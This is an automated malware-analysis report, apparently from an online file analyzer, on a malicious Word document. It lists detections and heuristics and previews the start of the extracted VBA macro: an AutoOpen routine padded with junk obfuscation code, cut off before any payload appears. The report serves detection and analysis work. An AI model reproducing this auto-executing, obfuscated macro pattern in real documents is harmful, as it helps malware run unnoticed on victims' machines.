MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Office document containing a VBA macro. The presence of the 'AutoOpen' macro indicates an attempt to automatically execute code when the document is opened. The ClamAV detection 'Doc.Malware.Pwshell-6700199-0' further confirms its malicious nature, suggesting it may be related to PowerShell-based malware. The macro itself is heavily obfuscated, preventing a detailed analysis of its specific actions.
Heuristics 5
-
ClamAV: Doc.Malware.Pwshell-6700199-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Pwshell-6700199-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 125552 bytes |
SHA-256: 06be6e59298e5cc51109c78c49265935b5989074c82c971d132d7df5d2731cb0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const nIxuporekIaBuROVBosYbuwEKOiiDYf = 0
Sub AutoOpen()
On Error Resume Next
Dim iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(5)
If LenB("LYrEHadYiiXYFaxasus") < 78869 Then
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(0) = VarType(Sqr(7886) + CInt("7886"))
End If
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(1) = LTrim("LYrEHadYiiXYFaxasus") & "99"
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(2) = Day(78867886)
If Len("iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf") < Len("LYrEHadYiiXYFaxasus") Then
iExenuqOtAZINOcyNaMoyXyJixycohYdSywArYf(3) = Weekday(78869)
End If
Dim nuQUroBiJodYNAsYCMIXALacUCOCEDitaFeLivYXav(5)
Dim laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(5)
If LenB("mECGIaaVapECuqImuCeGOru") < 87578 Then
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(0) = VarType(Sqr(8757) + CInt("8757"))
End If
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(1) = LTrim("mECGIaaVapECuqImuCeGOru") & "88"
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(2) = Day(87578757)
If Len("laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ") < Len("mECGIaaVapECuqImuCeGOru") Then
laMUxoporyLakuJUiALuMEioNIDIBiFoXoquZOQ(3) = Weekday(87578)
End If
Dim piPIgEMObApOFLIMyruHdunuHoDiniwejafU(5)
If LenB("hACUjoweLETatUcijEpyJ") < 32454 Then
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(0) = VarType(Sqr(3245) + CInt("3245"))
End If
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(1) = LTrim("hACUjoweLETatUcijEpyJ") & "44"
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(2) = Day(32453245)
If Len("piPIgEMObApOFLIMyruHdunuHoDiniwejafU") < Len("hACUjoweLETatUcijEpyJ") Then
piPIgEMObApOFLIMyruHdunuHoDiniwejafU(3) = Weekday(32454)
End If
Dim dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(5)
If LenB("iowdAlODEpoWufipy") < 10657 Then
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(0) = VarType(Sqr(1065) + CInt("1065"))
End If
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(1) = LTrim("iowdAlODEpoWufipy") & "77"
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(2) = Day(10651065)
If Len("dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf") < Len("iowdAlODEpoWufipy") Then
dAHohEwUjIQETunYQhyiuFojbODonaWbYJYWyzuVyf(3) = Weekday(10657)
End If
If LenB("HeXYGYvAKajAvegovOtYaYs") < 33683 Then
Dim kAaOPyiYVekNZesivEDOaUUvIGOygEvU(5)
If LenB("leqUuCYBygigyZufOzEkYku") < 46974 Then
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(0) = VarType(Sqr(4697) + CInt("4697"))
End If
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(1) = LTrim("leqUuCYBygigyZufOzEkYku") & "44"
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(2) = Day(46974697)
If Len("kAaOPyiYVekNZesivEDOaUUvIGOygEvU") < Len("leqUuCYBygigyZufOzEkYku") Then
kAaOPyiYVekNZesivEDOaUUvIGOygEvU(3) = Weekday(46974)
End If
Dim xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(5)
If LenB("tIDOHUCAVON") < 78457 Then
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(0) = VarType(Sqr(7845) + CInt("7845"))
End If
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(1) = LTrim("tIDOHUCAVON") & "77"
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(2) = Day(78457845)
If Len("xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai") < Len("tIDOHUCAVON") Then
xOjYLUwUHexeVuGYgRyfuQeXrEMazupIai(3) = Weekday(78457)
End If
nuQUroBiJodYNAsYCMIXALacUCOCEDitaFeLivYXav(0) = VarType(Sqr(3368) + CInt("3368"))
End If
Dim qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(5)
If LenB("TOxUfAqyXofuJISexi") < 84319 Then
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(0) = VarType(Sqr(8431) + CInt("8431"))
End If
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(1) = LTrim("TOxUfAqyXofuJISexi") & "99"
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(2) = Day(84318431)
If Len("qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN") < Len("TOxUfAqyXofuJISexi") Then
qAMlNaNazElErqeHYzUnFOepOdIJUlAmADAVAN(3) = Weekday(84319)
End If
Dim nOHvuiiNuWecufukfwATimolYqaKCuzOgUNarU(5)
If LenB("debeYdAPybYBu") < 29475 Then
nOHvuiiNuWecufukfwATimolYqaKCuzOgUNarU(0) = VarType(Sqr(2947) + CInt("2947"))
End If
nOHvuiiNuWecufukfwATimolYqaKCuzOgUNarU(1) = LTrim("debeYdAPybYBu") & "55"
n
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.